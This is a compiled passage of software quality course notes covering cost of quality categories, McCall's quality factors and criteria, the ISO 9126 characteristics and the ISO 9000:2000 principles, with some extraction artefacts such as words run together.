• To compare defects across modules and products in a meaningful way,normalize the defect count by product size. By normalizing defect countby product size in terms of the number of LOC, we can obtain a measure,called defect density . Intuitively, defect density is expressed as the numberof defects found per thousand lines of code.

• Separate the defects found during operation from the ones found duringdevelopment. The ratio of the number of defects found during operation tothe total number of defects is a measure of the effectiveness of the entiregamut of test activities. If the ratio is close to zero, we can say that testingwas highly effective. On the other hand, if the ratio is farther from the idealvalue of zero, say, 0.2, it is apparent that all the testing activities detectedonly 80% of the defects.

After defects are detected, the developers make an effort to fix them. Ulti-mately, it costs some money to fix defects—this is apart from the “reputation”cost to an organization from defects discovered during operation. The rework costincludes all the additional cost associated with defect-related activities, such asfixing documents. Rework is an additional cost that is incurred due to work beingdone in a less than perfect manner the first time it was done. It is obvious that

17.2 MCCALL’S QUALITY FACTORS AND CRITERIA 523

organizations strive to reduce the total cost of software development, including therework cost. The rework cost can be split into two parts as follows:

• Development Rework Cost: This is the rework cost incurred before aproduct is released to the customers.

• Operation Rework Cost: This is the rework cost incurred when a productis in operation.

On the one hand, the development rework cost is a measure of development effi-ciency. In other words, if the development rework cost is zero, then the developmentefficiency is very high. On the other hand, the operation rework cost is a measureof the delivered quality of the product in operation. If the development rework costis zero, then the delivered quality of the product in operation is very high. Thisis because the customers have not encountered any defect and, consequently, thedevelopment team is not spending any resource on defect fixing.

Cost of quality The "cost of quality" isn't the price of creating a quality product or service. It's the cost of NOT creating a quality product or service.

Every time work is redone, the cost of quality increases. Obvious examples include:

• The reworking of a manufactured item. • The retesting of an assembly. • The rebuilding of a tool. • The correction of a bank statement. • The reworking of a service, such as the reprocessing of a loan operation or the

replacement of a food order in a restaurant.

In short, any cost that would not have been expended if quality were perfect contributes to the cost of quality.

DEFINITION

Cost of Quality (COQ) is a measure that quantifies the cost of control/conformance and the cost of failure of control/non-conformance. In other words, it sums up the costs related to prevention and detection of defects and the costs due to occurrences of defects.

• Definition by ISTQB: cost of quality: The total costs incurred on quality activities and issues and often split into prevention costs, appraisal costs, internal failure costs and external failure costs.

• Definition by QAI: Money spent beyond expected production costs (labor, materials, equipment) to ensure that the product the customer receives is a

http://softwaretestingfundamentals.com/defect/

quality (defect free) product. The Cost of Quality includes prevention, appraisal, and correction or repair costs.

• The cost of poor quality affects: o Internal and external costs resulting from failing to meet requirements.

• The cost of good quality affects: o Costs for investing in the prevention of non-conformance to requirements. o Costs for appraising a product or service for conformance to requirements.

Total Quality Costs

quality costs are the total of the cost incurred by:

• Investing in the prevention of nonconformance to requirements. • Appraising a product or service for conformance to requirements. • Failing to meet requirements.

Categorization of Quality Costs

1. Prevention Costs

It is much better to prevent defects rather than finding and removing them from products. The costs incurred to avoid or minimize the number of defects at first place are known as prevention costs. Some examples of prevention costs are improvement of manufacturing processes, workers training, quality engineering, statistical process control etc.

The costs of all activities specifically designed to prevent poor quality in products or services.

Examples are the costs of:

• New product review • Quality planning • Supplier capability surveys • Process capability evaluations • Quality improvement team meetings • Quality improvement projects • Quality education and training

Prevention Costs are any costs that are incurred in an effort to minimize appraisal and failure costs. This category is where most quality professionals want to live. They say an ounce of prevention is worth a pound of cure and they is what this category is all about. This includes the activities that contribute to creation of the overall quality plan and the numerous specialized plans. Examples include:

Review of new products: The quality planning and inspection planning for new products and design of new products.

Process planning: Inspection planning, Process capability studies, various other work associated with the manufacturing and service processes.

Process control: Evaluation of in-process inspection procedures and and testing to determine the current status of a process

Quality audits: Evaluating adherence and execution of the overall quality plan.

Supplier quality selection and evaluation: Analyzing supplier quality activities prior to supplier selection, perform auditing of processes during the contract, education and training of suppliers.

Quality Training: Preparation and implementation of quality training programs. Similar to appraisal costs some of this work may be executed by personnel that are not in the quality assurance department. For accounting purposes it’s important to separate this by the type of work being performed and not the department of the employees performing the work. Activity based costing accounting lends itself to this.

2. Appraisal Costs

Appraisal costs (also known as inspection costs) are those cost that are incurred to identify defective products before they are shipped to customers. All costs associated with the activities that are performed during manufacturing processes to ensure required quality standards are also included in this category. Identification of defective products

involve the maintaining a team of inspectors. It may be very costly for some organizations.

The costs associated with measuring, evaluating or auditing products or services to assure conformance to quality standards and performance requirements.

These include the costs of:

• Incoming and source inspection/test of purchased material • In-process and final inspection/test • Product, process or service audits • Calibration of measuring and test equipment • Associated supplies and materials

Appraisal costs constitute all costs that go testing and inspection of products. The detection of defective parts and products should be caught as early as possible in the manufacturing process. Appraisal costs are sometimes called inspection costs and are incurred to identify defective products before the products are shipped to customers. The problem with appraisal costs is in the fact that they are not true “value added” activities since the generally inspection and testing are not requirements of the customer. The customer just expects the product to function as advertised with no requirement for the product to be tested. The fact that the product is tested and advertised as such may make the customer feel better about the product but the expectation is for the product to, “just work” and if the product was never tested then the customer would not care anyway.

There are exceptions to this rule when customers require product testing as part of their purchase order / contract. So, why do we spend so many resources on testing and inspecting products? The answer is in the failure costs associated with allowing a defect to escape to the next process or customer.

Another unfortunate aspect of performing appraisal activities is that it doesn’t keep defects from happening again. Due to this managers see that maintaining an army of inspectors can be very costly and ineffective approach to quality control.

Today’s quality initiatives are increasingly asking employees and suppliers to be responsible for their own quality control. Further innovations are being put into designing products to be manufactured in ways to eliminate the need for inspections or testing. Engineering reliability into a product is the most efficient process to reduce quality costs.

Failure Costs

The costs resulting from products or services not conforming to requirements or customer/user needs. Failure costs are divided into internal and external failure categories.

3. Internal Failure Costs

Internal failure costs are those costs that are incurred to remove defects from the products before shipping them to customers. Examples of internal failure costs include cost of rework, rejected products, scrap etc.

Failure costs occurring prior to delivery or shipment of the product, or the furnishing of a service, to the customer.


• Scrap • Rework • Re-inspection • Re-testing • Material review • Downgrading

Internal failure costs are costs that are incurred as a result of identifying defective products before they are shipped to customers. The labor, material, and (usually) overhead that created the defective product. The areas / nomenclatures are numerous and include; scrap, spoilage, defectives, etc.

The cost to correct the defective material or errors in service products which are found prior to sending to the customer. Some examples of internal costs of quality are:

• Lost or missing information: The cost to retrieve this expected information. The cost analyzing nonconforming goods or services to determine the root causes.

• Supplier scrap and rework: Scrap and rework costs due to nonconforming product received from suppliers. This includes the costs to the buyer of resolving the supplier quality problems.

• 100% Sorting inspection: The cost of completing 100% inspection to sort defective units from good units.

• Retest: The cost to retest products after rework or other revision. Changing processes: The cost of modifying the manufacturing or service processes to correct the deficiencies.

• Redesign of hardware: The cost to change designs of hardware to correct the issues.

• Redesign of software: The internal cost to changing software designs. • Scrapping of obsolete product: The cost of disposing scrap.

• Scrap in support operations: Costs from defective items in indirect operations. Rework in internal support operations: Costs from correcting defective items in indirect operations.

• Downgrading: The cost difference between the normal selling price and the reduced price due to quality reasons.

• Variability of product characteristics: Rework losses that occur with conforming product (e.g., overfill of packages due to variability of filling and measuring equipment).

• Unplanned downtime of equipment: Loss of capacity of equipment due to failures.

• Inventory shrinkage: Loss costs due to the difference between actual and recorded inventory quantity.

• Non-value-added activities: Cost due to redundant operations, sorting inspections, and other non-value added activities. A value-added activity increases the usefulness of a product to the customer; a non-value-added activity does not.

4. External Failure Costs

If defective products have been shipped to customers, external failure costs arise. External failure costs include warranties, replacements, lost sales because of bad reputation, payment for damages arising from the use of defective products etc. The shipment of defective products can dissatisfy customers, damage goodwill and reduce sales and profits.

Failure costs occurring after delivery or shipment of the product — and during or after furnishing of a service — to the customer.


• Processing customer complaints • Customer returns • Warranty claims • Product recalls

External Failure costs represent a category in the total cost of quality where the quality costs are related to defects found after delivery of the product to the customer. External failure costs are generally the highest of the 4 cost of quality categories since the full value of work and processes had to be performed to get the product to the customer. These costs are incurred because the product shipped failed to conform to quality requirements and may include warranties, shipping charges, repairs, recalls, legal actions and lost sales.

External failure costs are notorious for being difficult to measure due to the hidden costs associated with defective products being received by the end user. So how does one measure the cost of lost sales or loss of potential customers? One method is by using customer survey that ask such questions regarding the behavior of returning product.

Example, Using a customer survey one might determine that 9 out of 10 customers who purchase a defective product are likely to discard it and only 1 of 10 return it to the manufacturer for refund or replacement a multiplier can be applied to estimate customer returns. In this case multiplying actual customer returns by can provide a reasonable estimate of this element of external failure cost. This number can help determine the typical customer’s intention to on buying the product again after receiving a defective one and the number of dissatisfied customers that may provide a measure of lost sales.

Total Quality Costs:

The sum of the above costs. This represents the difference between the actual cost of a product or service and what the reduced cost would be if there were no possibility of substandard service, failure of products or defects in their manufacture.

The internal and external failure costs are generally associated with the Cost of Poor Quality whereas the Appraisal and Prevention Costs constitute the costs related to ensuring the product is indeed to requirements. It is the overall goal of a quality management system to work within the appraisal and prevention cost areas since these areas provide greater leverage to ensure quality and reduce total quality costs. For example: If a metal tube fails to meet a blueprint dimension it would be more cost effective to dimensionally inspect (appraisal cost) the tube prior to it being shipped to the customer rather than the customer finding the non-conformance and thereby adding more cost to the manufacturer in warranty, shipping costs, and additional time for employees to work and investigate the defect (external failure costs).

1. McCall’s Quality Model (1977)The concept of software quality and the efforts to understand it in terms of mea-surable quantities date back to the mid-1970s. McCall, Richards, and Walters [6]were the first to study the concept of software quality in terms of quality factorsand quality criteria.

1.1 Quality Factors

A quality factor represents a behavioral characteristic of a system. Some examplesof high-level quality factors are correctness , reliability , efficiency , testability ,portability , and reusability . A full list of the quality factors will be given ina later part of this section. As the examples show, quality factors are externalattributes of a software system. Customers, software developers, and qualityassurance engineers are interested in different quality factors to a different extent.For example, customers may want an efficient and reliable software with lessconcern for portability. The developers strive to meet customer needs by makingtheir system efficient and reliable, at the same time making the product portableand reusable to reduce the cost of software development. The software qualityassurance team is more interested in the testability of a system so that someother factors, such as correctness, reliability, and efficiency, can be easily verifiedthrough testing. The testability factor is important to developers and customers aswell: (i) Developers want to test their product before delivering it to the softwarequality assurance team and (ii) customers want to perform acceptance tests beforetaking delivery of a product. In Table 17.1, we list the quality factors as definedby McCall et al. [6]. Now we explain the 11 quality factors in more detail:

Correctness : A software system is expected to meet the explicitly specifiedfunctional requirements and the implicitly expected nonfunctional require-ments. If a software system satisfies all the functional requirements, the

Various software quality models have been proposed to define quality and its related attributes. The most influential ones are the ISO 9126 and the CMM. The ISO 9126 quality model was developed by an expert group under the aegis of the International Organization for Standardization (ISO). The document ISO 9126 defines six broad, independent categories of quality characteristics: functionality, reliability, usability, efficiency, maintainability, and portability. The CMM was developed by the Software Engineering Institute (SEI) at Carnegie Mellon University. In the CMM framework, a development process is evaluated on a scale of 1–5, commonly known as level 1 through level 5. For example, level 1 is called the initial level, whereas level 5—optimized—is the highest level of process maturity.

Quality models


TABLE 17.1 McCall’s Quality Factors

Quality Factors Definition

Correctness Extent to which a program satisfies its specifications and fulfills the user’smission objectives

Reliability Extent to which a program can be expected to perform its intended functionwith required precision

Efficiency Amount of computing resources and code required by a program toperform a function

Integrity Extent to which access to software or data by unauthorized persons can becontrolled

Usability Effort required to learn, operate, prepare input, and interpret output of aprogram

Maintainability Effort required to locate and fix a defect in an operational program

Testability Effort required to test a program to ensure that it performs its intendedfunctions

Flexibility Effort required to modify an operational program

Portability Effort required to transfer a program from one hardware and/or softwareenvironment to another

Reusability Extent to which parts of a software system can be reused in otherapplications

Interoperability Effort required to couple one system with another

Source: From ref. 6.

system is said to be correct. However, a correct software system may stillbe unacceptable to customers if the system fails to meet unstated require-ments, such as stability, performance, and scalability. On the other hand,even an incorrect system may be accepted by users.

Reliability : It is difficult to construct large software systems which are cor-rect. A few functions may not work in all execution scenarios, and,therefore, the software is considered to be incorrect. However, the soft-ware may still be acceptable to customers because the execution scenarioscausing the system to fail may not frequently occur when the system isdeployed. Moreover, customers may accept software failures once in awhile. Customers may still consider an incorrect system to be reliable ifthe failure rate is very small and it does not adversely affect their missionobjectives. Reliability is a customer perception, and an incorrect softwarecan still be considered to be reliable.

Efficiency : Efficiency concerns to what extent a software system utilizesresources, such as computing power, memory, disk space, communicationbandwidth, and energy. A software system must utilize as little resourcesas possible to perform its functionalities. For example, by utilizing lesscommunication bandwidth a base station in a cellular telephone networkcan support more users.


Integrity : A system’s integrity refers to its ability to withstand attacks toits security. In other words, integrity refers to the extent to which accessto software or data by unauthorized persons or programs can be con-trolled. Integrity has assumed a prominent role in today’s network-basedapplications. Integrity is also an issue in multiuser systems.

Usability : A software system is considered to be usable if human users find iteasy to use. Users put much emphasis on the user interface of software sys-tems. Without a good user interface a software system may fizzle out evenif it possesses many desired qualities. However, it must be rememberedthat a good user interface alone cannot make a product successful—theproduct must also be reliable, for example. If a software fails too often,no good user interface can keep it in the market.

Maintainability : In general, maintenance refers to the upkeep of productsin response to deterioration of their components due to continued useof the products. Maintainability refers to how easily and inexpensivelythe maintenance tasks can be performed. For software products, there arethree categories of maintenance activities: corrective, adaptive, and per-fective. Corrective maintenance is a postrelease activity, and it refers tothe removal of defects existing in an in-service software. The existingdefects might have been known at the time of release of the product ormight have been introduced during maintenance. Adaptive maintenanceconcerns adjusting software systems to changes in the execution environ-ment. Perfective maintenance concerns modifying a software system toimprove some of its qualities.

Testability : It is important to be able to verify every requirement, both explic-itly stated and simply expected. Testability means the ability to verifyrequirements. At every stage of software development, it is necessary toconsider the testability aspect of a product. Specifically, for each require-ment we try to answer the question: What procedure should one use totest the requirement, and how easily can one verify it? To make a producttestable, designers may have to instrument a design with functionalitiesnot available to the customer.

Flexibility : Flexibility is reflected in the cost of modifying an operationalsystem. As more and more changes are effected in a system throughoutits operational phase, subsequent changes may cost more and more. If theinitial design is not flexible, it is highly likely that subsequent changes arevery expensive. In order to measure the flexibility of a system, one has tofind an answer to the question: How easily can one add a new feature toa system?

Portability : Portability of a software system refers to how easily it canbe adapted to run in a different execution environment. An executionenvironment is a broad term encompassing hardware platform, operat-ing system, distributedness, and heterogeneity of the hardware system, to


name a few. Portability is important for developers because a minor adap-tation of a system can increase its market potential. Moreover, portabilitygives customers an option to easily move from one execution environ-ment to another to best utilize emerging technologies in furthering theirbusiness. Good design principles such as modularity facilitate portability.For example, all environment-related computations can be localized in afew modules so that those can be easily identified and modified to portthe system to another environment.

Reusability : Reusability means if a significant portion of one product canbe reused, maybe with minor modification, in another product. It maynot be economically viable to reuse small components. Reusability savesthe cost and time to develop and test the component being reused. In thefield of scientific computing, mathematical libraries are commonly reused.Reusability is not just limited to product parts, rather it can be applied toprocesses as well. For example, we are very much interested in developinggood processes that are largely repeatable.

Interoperability : In this age of computer networking, isolated software sys-tems are turning into a rarity. Today’s software systems are coupled atthe input–output level with other software systems. Intuitively, interop-erability means whether or not the output of one system is acceptable asinput to another system; it is likely that the two systems run on differentcomputers interconnected by a network. When we consider Internet-basedapplications and wireless applications, the need for interoperability is sim-ply overriding. For example, users of document processing packages, suchas LaTex and Microsoft Word, want to import a variety of images producedby different graphics packages. Therefore, the graphics packages and thedocument processing packages must be interoperable. Another example ofinteroperability is the ability to roam from one cellular phone network inone country to another cellular network in another country.

The 11 quality factors defined in Table 17.1 have been grouped into threebroad categories as follows:

• Product operation

• Product revision

• Product transition

The elements of each of the three broad categories are identified and furtherexplained in Table 17.2. It may be noted that the above three categories relatemore to postdevelopment activities expectations and less to in-development activi-ties. In other words, McCall’s quality factors emphasize more on the quality levelsof a product delivered by an organization and the quality levels of a deliveredproduct relevant to product maintenance. Quality factors in the product operationcategory refer to delivered quality. Testability is an important quality factor that isof much significance to developers during both product development and mainte-nance. Maintainability, flexibility, and portability are desired quality factor sought


TABLE 17.2 Categorization of McCall’s Quality Factors

Quality Categories Quality Factors Broad Objectives

Product operation Correctness Does it do what the customer wants?

Reliability Does it do it accurately all of the time?

Efficiency Does it quickly solve the intended problem?

Integrity Is it secure?

Usability Can I run it?

Product revision Maintainability Can it be fixed?

Testability Can it be tested?

Flexibility Can it be changed?

Product transition Portability Can it be used on another machine?

Reusability Can parts of it be reused?

Interoperability Can it interface with another system?


in a product so that the task of supporting the product after delivery is less expen-sive. Reusability is a quality factor that has the potential to reduce the developmentcost of a project by allowing developers to reuse some of the components from anexisting product. Interoperability allows a product to coexist with other products,systems, and features.

1.2 Quality Criteria

A quality criterion is an attribute of a quality factor that is related to software devel-opment. For example, modularity is an attribute of the architecture of a softwaresystem. A highly modular software allows designers to put cohesive components inone module, thereby increasing the maintainability of the system. Similarly, trace-ability of a user requirement allows developers to accurately map the requirementto a subset of the modules, thereby increasing the correctness of the system. Somequality criteria relate to products and some to personnel. For example, modularityis a product-related quality criterion, whereas training concerns development andsoftware quality assurance personnel. In Table 17.3, we list the 23 quality criteriadefined by McCall et al. [6].

1.3 Relationship between Quality Factors and Criteria

The relationship between quality factors and quality criteria is shown in Figure 17.1.An arrow from a quality criterion to a quality factor means that the quality criterionhas a positive impact on the quality factor. For example, traceability has a positiveimpact on correctness. Similarly, the quality criterion simplicity positively impactsreliability, usability, and testability.

Though it is desirable to improve all the quality factors, doing so may not bepossible. This is because, in general, quality factors are not completely independent.Thus, we note two characteristics of the relationship as follows:


Software–system independence

Instrumentation

Data commonality

Communications commonality

Machine independence

Modularity

Generality

Expandability

Self-descriptiveness

Conciseness

Simplicity

Communicativeness

Training

Operability

Access audit

Access control

Storage efficiency

Execution efficiency

Error tolerance

Accuracy

Consistency

Completeness

Traceability

Correctness

Reliability

Efficiency

Integrity

Maintainability

Usability

Testability

Flexibility

Portability

Reusability

Interoperability

Quality criteria Quality factors

Figure 17.1 Relation between quality factors and quality criteria [6].

• If an effort is made to improve one quality factor, another quality factormay be degraded. For example, if an effort is made to make a softwareproduct testable, the efficiency of the software is likely to go down. Tomake code testable, programmers may not be able to write compact code.Moreover, if we are interested in making a product portable, the code must


TABLE 17.3 McCall’s Quality Criteria

Quality Criteria Definition

Access audit Ease with which software and data can be checked forcompliance with standards or other requirements

Access control Provisions for control and protection of the software anddata

Accuracy Precision of computations and output

Communication commonality Degree to which standard protocols and interfaces are used

Completeness Degree to which a full implementation of the requiredfunctionalities has been achieved

Communicativeness Ease with which inputs and outputs can be assimilated

Conciseness Compactness of the source code, in terms of lines of code

Consistency Use of uniform design and implementation techniques andnotation throughout a project

Data commonality Use of standard data representations

Error tolerance Degree to which continuity of operation is ensured underadverse conditions

Execution efficiency Run time efficiency of the software

Expandability Degree to which storage requirements or software functionscan be expanded

Generality Breadth of the potential application of software components

Hardware independence Degree to which the software is dependent on theunderlying hardware

Instrumentation Degree to which the software provides for measurement ofits use or identification of errors

Modularity Provision of highly independent modules

Operability Ease of operation of the software

Self-documentation Provision of in-line documentation that explainsimplementation of components

Simplicity Ease with which the software can be understood.

Software system independence Degree to which the software is independent of its softwareenvironment—nonstandard language constructs, operatingsystem, libraries, database management system, etc.

Software efficiency Run time storage requirements of the software

Traceability Ability to link software components to requirements

Training Ease with which new users can use the system


be written in such a manner that it is easily understandable, and, hence,code need not be in a compact form. An effort to make code portableis likely to reduce its efficiency. In fact, attempts to improve integrity,usability, maintainability, testability, flexibility, portability, reusability, andinteroperability will reduce the efficiency of a software system.

• Some quality factors positively impact others. For example, an effort toenhance the correctness of a system will increase its reliability. As another


example, an effort to enhance the testability of a system will improve itsmaintainability.

1.4 Quality Metrics

The high-level quality factors cannot be measured directly. For example, we can-not directly measure the testability of a software system. Neither can testability beexpressed in “yes” or “no” terms. Instead, the degree of testability can be assessedby associating with testability a few quality metrics, namely, simplicity , instru-mentation , self-descriptiveness , and modularity . A quality metric is a measure thatcaptures some aspect of a quality criterion. One or more quality metrics should beassociated with each criterion. The metrics can be derived as follows:

• Formulate a set of relevant questions concerning the quality criteria andseek a “yes” or “no” answer for each question.

• Divide the number of “yes” answers by the number of questions to obtaina value in the range of 0 to 1. The resulting number represents the intendedquality metric.

For example, we can ask the following question concerning the self-descriptivenessof a product: Is all documentation written clearly and simply such that procedures,functions, and algorithms can be easily understood? Another question concerningself-descriptiveness is: Is the design rationale behind a module clearly understood?Different questions can have different degrees of importance in the computation ofa metric, and, therefore, individual “yes” answers can be differently weighted inthe above computation.

The above way of computing the value of a metric is highly subjective. Thedegree of subjectivity varies significantly from question to question in spite of thefact that all the responses are treated equally. It is difficult to combine differentmetrics to get a measure of a higher level quality factor. In addition, for somequestions it is more meaningful to consider a response on a richer measurementscale. For example, the question “Is the design of a software system simple?” needsto be answered on a multiple ordinal scale to reflect a variety of possible answers,rather than a yes-or-no answer.

Similarly, one cannot directly measure the reliability of a system. However,the number of distinct failures observed so far is a measure of the initial reliabilityof the system. Moreover, the time gap between observed failures is treated as ameasure of the reliability of a system.

2 ISO 9126 Model

There has been international collaboration among experts to define a general frame-work for software quality. An expert group, under the aegis of the ISO, standardizeda software quality document, namely, ISO 9126, which defines six broad, indepen-dent categories of quality characteristics as follows:

17.3 ISO 9126 QUALITY CHARACTERISTICS 531

Functionality : A set of attributes that bear on the existence of a set of func-tions and their specified properties. The functions are those that satisfystated or implied needs.

Reliability : A set of attributes that bear on the capability of software tomaintain its performance level under stated conditions for a stated periodof time.

Usability : A set of attributes that bear on the effort needed for use and onthe individual assessment of such use by a stated or implied set of users.

Efficiency : A set of attributes that bear on the relationship between thesoftware’s performance and the amount of resource used under statedconditions.

Maintainability : A set of attributes that bear on the effort needed to makespecified modifications (which may include corrections, improvements,or adaptations of software to environmental changes and changes in therequirements and functional specifications).

Portability : A set of attributes that bear on the ability of software to be trans-ferred from one environment to another (this includes the organizational,hardware or, software environment).

The ISO 9126 standard includes an example quality model, as shown in Figure 17.2,that further decomposes the quality characteristics into more concrete subcharac-teristics. For example, the maintainability characteristic has been decomposed intofour subcharacteristics, namely, analyzability , changeability , stability , and testa-bility . The decomposition shown in Figure 17.2 is just a sample model—and nota universal one. The 20 subcharacteristics of Figure 17.2 are defined as follows:

Suitability : The capability of the software to provide an adequate set offunctions for specified tasks and user objectives.

Accuracy : The capability of the software to provide the right or agreed-uponresults or effects.

Interoperability : The capability of the software to interact with one or morespecified systems.

Security : The capability of the software to prevent unintended access andresist deliberate attacks intended to gain unauthorized access to confiden-tial information or to make unauthorized modifications to information orto the program so as to provide the attacker with some advantage or so asto deny service to legitimate users.

Maturity : The capability of the software to avoid failure as a result of faultsin the software.

Fault Tolerance: The capability of the software to maintain a specified levelof performance in case of software faults or of infringement of its specifiedinterface.

Recoverability : The capability of the software to reestablish its level of per-formance and recover the data directly affected in the case of a failure.


Quality subcharacteristics

Suitability

Accuracy

Interoperability

Security

Maturity

Fault tolerance

Recoverability

Reliability

Usability

Understandability

Learnability

Operability

EfficiencyTime behavior

Resource behavior

Maintainability

Portability

Analyzability

Changeability

Stability

Testability

Adaptability

Installability

Conformance

Replaceability

Functionality

Quality characteristic

Figure 17.2 ISO 9126 sample quality model refines standard’s features intosubcharacteristics. (From ref. 4. © 1996 IEEE.)

17.3 ISO 9126 QUALITY CHARACTERISTICS 533

Understandability : The capability of the software product to enable the userto understand whether the software is suitable, and how it can be used forparticular tasks and conditions of use.

Learnability : The capability of the software product to enable the user tolearn its applications.

Operability : The capability of the software product to enable the user tooperate and control it.

Attractiveness : The capability of the software product to be liked by the user.

Time Behavior : The capability of the software to provide appropriateresponse and processing times and throughput rates when performing itsfunction under stated conditions.

Resource Utilization: The capability of the software to use appropriateresources in an appropriate time when the software performs its functionunder stated condition.

Analyzability : The capability of the software product to be diagnosed fordeficiencies or causes of failures in the software or for the parts to bemodified to be identified.

Changeability : The capability of the software product to enable a specifiedmodification to be implemented.

Stability : The capability of the software to minimize unexpected effects frommodifications of the software.

Testability : The capability of the software product to enable modified soft-ware to be validated.

Adaptability : The capability of the software to be modified for different spec-ified environments without applying actions or means other than thoseprovided for this purpose for the software considered.

Installability : The capability of the software to be installed in a specifiedenvironment.

Coexistence: The capability of the software to coexist with other independentsoftware in a common environment sharing common resources.

Replaceability : The capability of the software to be used in place of otherspecified software in the environment of that software.

Organizations must define their own quality characteristics and subcharacteristicsafter a fuller understanding of their needs. In other words, organizations mustidentify the level of the different quality characteristics they need to satisfy withintheir context of software development. Reaching an ideally best quality level fromthe present one is a gradual process. Therefore, it is important to understand theneed for moving on to the next achievable step toward the highest level—theideally best level.

At this point it is useful to compare McCall’s quality model with the ISO 9126model. Since the two models focus on the same abstract entity, namely, softwarequality , it is natural that there are many similarities between the two models. What


is called quality factor in McCall’s model is called quality characteristic in theISO 9126 model. The following high-level quality factors/characteristics are foundin both models: reliability, usability, efficiency, maintainability, and portability.However, there are several differences between the two models as explained in thefollowing:

• The ISO 9126 model emphasizes characteristics visible to the users,whereas the McCall model considers internal qualities as well. Forexample, reusability is an internal characteristic of a product. Productdevelopers strive to produce reusable components, whereas its impact isnot perceived by customers.

• In McCall’s model, one quality criterion can impact several quality factors,whereas in the ISO 9126 model, one subcharacteristic impacts exactly onequality characteristic.

• A high-level quality factor, such as testability, in the McCall model is alow-level subcharacteristic of maintainability in the ISO 9126 model.

Following are a few concerns with the quality models [4]:

• There is no consensus about what high-level quality factors are most impor-tant at the top level. McCall et al. suggest 11 high-level quality factors,whereas the ISO 9126 standard defines only 6 quality characteristics. Someof the quality factors in the McCall model are more important to developers.For example, reusability and interoperability are important to developers.However, the ISO 9126 model just considers the product.

• There is no consensus regarding what is a top-level quality factor/characteristic and what is a more concrete quality criterion/subcharacte-ristic. These days many applications run on computer and communicationsnetworks. However, interoperability is not an independent, top-levelquality characteristic in the ISO 9126 model. It is not clear whyinteroperability is a part of functionality. The absence of a rationale makesit difficult to follow a prescribed quality model.

3 ISO 9000:2000 Model

There are ongoing efforts at the international level for standardizing differentaspects of computer communications and software development. Standardizationhas been particularly successful in the field of computer networking and wirelesscommunications. For example, the collaborative work of the Internet EngineeringTask Force (IETF) has been the key to the proliferation of the Internet. Similarly,standardization efforts from the IEEE have led to the successful development ofthe local area network (LAN) standard, namely the IEEE 802.3 standard, and thewireless local area network (WLAN) standards, namely IEEE 802.11a/b/g.

In spite of the positive consequence of standardization in the field of com-munications, standardization in software development is met with mixed reactions.

17.4 ISO 9000:2000 SOFTWARE QUALITY STANDARD 535

On the one hand, the main argument against standardization is that it curtails indi-vidual drive to be innovative. On the other hand, standards reduce the activity ofreinventing the same, or similar, processes for development and quality assurance.Repeatability of processes is a key benefit emanating from standardization—andrepeatability reduces the cost of software development and produces a base qualitylevel of software products.

The ISO has developed a series of standards, collectively known as the ISO9000. The ISO was founded in 1946, and it is based in Geneva, Switzerland. Itdevelops and promotes international standards in the field of quality assurance andquality management. The ISO 9000 standards are generally applicable to all tangibleproducts manufactured with human endeavor, say, from spices to software—Evensome brands of spice and rice used in everyday cooking are claimed to be ISO9000 certified. The ISO 9000 standards are reviewed and updated from time totime, once every 5–8 years. The latest ISO 9000 standards released in the year2000 are referred to as ISO 9000:2000. There are three components of the ISO9000:2000 standard as follows:

ISO 9000 : Fundamentals and vocabulary [7]

ISO 9001 : Requirements [8]

ISO 9004 : Guidelines for performance improvements [9]

At this point we remind the reader that ISO 9002 and ISO 9003 were parts ofISO 9000:1994, but these are no longer parts of ISO 9000:2000. ISO 9002 dealtwith the quality system model for quality assurance in production and installation,whereas ISO 9003 dealt with the quality system model for quality assurance infinal inspection and testing.

3.1 ISO 9000:2000 Fundamentals

The ISO 9000:2000 standard is based on the following eight principles:

• Principle 1. Customer Focus: Success of an organization is highly depen-dent on satisfying the customers. An organization must understand itscustomers and their needs on a continued basis. Understanding the cus-tomers helps in understanding and meeting their requirements. It is notenough to just meet customer requirements. Rather, organizations mustmake an effort to exceed customer expectations. By understanding the cus-tomers, one can have a better understanding of their real needs and theirunstated expectations. People in different departments of an organization,such as marketing, software development, testing, and customer support,must capture the same view of the customers and their requirements. Anexample of customer focus is to understand how they are going to usea system. By accurately understating how customers are going to use asystem, one can produce a better user profile.

• Principle 2. Leadership: Leaders set the direction their organizationshould take, and they must effectively communicate this to all thepeople involved in the process. All the people in an organization must


have a coherent view of the organizational direction. Without a goodunderstanding of the organizational direction, employees will find itdifficult to know where they are heading. Leaders must set challenging butrealistic goals and objectives. Employee contribution should be recognizedby the leaders. Leaders create a positive environment and provide supportfor the employees to collectively realize the organizational goal. Theyreevaluate their goals on a continual basis and communicate the findingsto the staff.

• Principle 3. Involvement of People: In general, organizations rely onpeople. People are informed of the organizational direction, and they areinvolved at all levels of decision making. People are given an opportunityto develop their strength and use their abilities. People are encouraged tobe creative in performing their tasks.

• Principle 4. Process Approach: There are several advantages to perform-ing major tasks by using the concept of process . A process is a sequenceof activities that transform inputs to outputs. Organizations can prepare aplan in the form of allocating resources and scheduling the activities bymaking the process defined, repeatable, and measurable. Consequently, theorganization becomes efficient and effective. Continuous improvement inprocesses leads to improvement in efficiency and effectiveness.

• Principle 5. System Approach to Management: A system is an interact-ing set of processes. A whole organization can be viewed as a system ofinteracting processes. In the context of software development, we can iden-tify a number of processes. For example, gathering customer requirementsfor a project is a distinct process involving specialized skills. Similarly,designing a functional specification by taking the requirements as input isanother distinct process. There are simultaneous and sequential processesbeing executed in an organization. At any time, people are involved in oneor more processes. A process is affected by the outcome of some otherprocesses, and, in turn, it affects some other processes in the organization.It is important to understand the overall goal of the organization and theindividual subgoals associated with each process. For an organization as awhole to succeed in terms of effectiveness and efficiency, the interactionsamong processes must be identified and analyzed.

• Principle 6. Continual Improvement: Continual improvement means thatthe processes involved in developing, say, software products are reviewedon a periodic basis to identify where and how further improvements inthe processes can be effected. Since no process can be a perfect one tobegin with, continual improvement plays an important role in the successof organizations. Since there are independent changes in many areas, suchas customer views and technologies, it is natural to review the processesand seek improvements. Continual process improvements result in lowercost of production and maintenance. Moreover, continual improvementslead to less differences between the expected behavior and actual behavior


of products. Organizations need to develop their own policies regardingwhen to start a process review and identify the goals of the review.

• Principle 7. Factual Approach to Decision Making: Decisions may bemade based on facts, experience, and intuition. Facts can be gathered byusing a sound measurement process. Identification and quantification ofparameters are central to measurement. Once elements are quantified, itbecomes easier to establish methods to measure those elements. There is aneed for methods to validate the measured data and make the data availableto those who need it. The measured data should be accurate and reliable.A quantitative measurement program helps organizations know how muchimprovement has been achieved due to a process improvement.

